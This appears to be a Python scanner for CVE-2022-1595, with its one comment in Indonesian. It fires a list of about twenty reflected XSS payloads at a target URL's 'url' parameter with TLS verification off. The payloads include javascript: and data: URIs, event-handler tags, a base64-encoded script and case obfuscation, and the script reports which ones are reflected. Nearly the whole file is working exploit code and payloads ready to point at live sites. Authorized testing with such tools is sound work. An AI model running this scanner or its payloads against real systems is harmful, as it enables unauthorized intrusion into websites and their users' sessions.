import requests
from urllib.parse import urlencode, quote
import urllib3

urllib3.disable_warnings()

# Semua payload XSS yang digunakan untuk CVE-2022-1595
payloads = [
    "javascript:alert(1)",
    "data:text/html,<script>alert(1)</script>",
    "<script>alert(document.domain)</script>",
    "';alert(1)//",
    "\"><script>alert(1)</script>",
    "\"><img src=x onerror=alert(1)>",
    "data:text/html,<svg/onload=alert(1)>",
    "<iframe src=javascript:alert(1)>",
    "<a href=javascript:alert(1)>CLICK</a>",
    "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",  # Base64: <script>alert(1)</script>
    "data:text/html,<body onload=alert(1)>",
    "<script>confirm(1)</script>",
    "<script>prompt(1)</script>",
    "javascript:eval('alert(1)')",
    "data:text/html,<object data=javascript:alert(1)>",
    "data:text/html,<video><source onerror=alert(1)>",
    "data:text/html,<details open ontoggle=alert(1)>",
    "<math><mi//xlink:href='data:x,<script>alert(1)</script>'>",
    "<body onresize=alert(1)>",
    "jaVasCript:al\u0065rt(1)",
    "data:text/html,<isindex onfocus=alert(1) autofocus>",
]

def test_cve_2022_1595(target_url):
    vulnerable = False
    print(f"[+] Testing target: {target_url}")
    for payload in payloads:
        full_url = f"{target_url}?pk=1&shell_version=42&url={quote(payload)}"
        try:
            response = requests.get(full_url, timeout=10, verify=False)
            if payload.strip("<>'\"") in response.text:
                print(f"[!] Reflected Payload Detected:\n    URL: {full_url}\n")
                vulnerable = True
        except Exception as e:
            print(f"[-] Error testing payload: {payload}\n    {str(e)}\n")
    if not vulnerable:
        print("[✓] No payloads reflected in response.")

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print("Usage: python3 cve_2022_1595_scanner.py https://target.com/extension-info/")
        sys.exit(1)
    test_cve_2022_1595(sys.argv[1])
